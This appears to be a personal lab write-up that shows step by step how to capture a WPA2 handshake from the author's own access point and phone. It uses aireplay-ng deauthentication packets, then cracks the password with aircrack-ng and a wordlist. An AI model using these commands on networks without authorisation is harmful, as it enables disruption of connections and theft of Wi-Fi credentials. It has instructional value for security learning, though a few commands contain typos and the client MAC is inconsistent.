Summary: I will be gathering the Access Point MAC address and MAC address of my phone. I will then send 10 deauthentication packets which will cause my phone to disconnect and reauthenticate to the Access Point. We then capture the authentication prcoess save it locally and crack the password
Do not hack into any networks without prior authorisation
Configure the Wireless Access point
if using the TPLink TL-WN823N follow this adapter setup otherwise you can skip this section
link: https://github.com/gnab/rtl8812au
enter these commands in the terminal:
-
sudo apt-get update
-
sudo apt-get install linux\-headers\-$\(uname \-r\)
-
git clone [https://github\.com/gnab/rtl8812au](https://github.com/gnab/rtl8812au)
-
cd rtl8812au
-
make
-
sudo insmod 8812au.ko
-
sudo cp 8812au.ko /lib/modules/$\(uname r\)/kernel/drivers/net/wireless
-
sudo depmod
-
sudo apt-get install build-essential dkms
-
sudo make dkms_install
-
echo 8192eu | sudo tee -a /etc/modules
Add the Wireless adapter to VirtualBox
-
sudo airmon-ng check kill
checks for conflicting processes and kills them. This however will result in loss of internet for the VM, can be solved by restarting. -
iwconfig
shows the adapter names. In my case wlan0 is the wireless adapter. -
sudo airmon-ng start wlan 0
- Starts the wireless adapter in monitor mode.
sudo airodump-ng -c 11 wlan0
- discovers access points on channel 11 using wlan0
BSSID is the access point MAC address of the router. In this case we are looking at the BSSID for CyberSec
The MAC address of 0C:8D:CA:A6:94:8D is my phone and that is where the deauthentication packets are getting sent.
sudo airodump-ng -c 11 --bssid B0-95-75-5C-3B-94 -w psk wlan0
-c specifices the channel number to scan, in this case channel 11. Bssid is the MAC address of the Access Point. -w writes the output to a file locally using the name after it, in this case psk.
This captures packets for the CyberSec accesspoint and saves it locally to a file named psk
sudo aireplay-ng -0 10 -a B0:95:75:5C:3B:94 -c 0C:8D:CA:A6:93:8D wlan0
-0 sets the mode as deauth, alternatively can be set by using --deauth instead. "10" sets the number of deauthenication packets sent. -A is the Access Point MAC address. -C is the client MAC address. wlan0 is the interface the command is being used on.
This sends 10 deauthentication packets to my phone which will disconnect from the Access Point and automatically reconnect. The reauthentication process for the WPA2 handshake is captured and saved locally.
Using the previous wpa2 handshake capture we can brute force the password using a passwordlist. I created one called passwordlist with the password of Password1 in it for lab demostration purpose. But Kali has default wordlists in the /usr/share/wordlists directory
aircrack-ng -w passwordlist.txt psk-02.cap
- This is what is used to crack the password.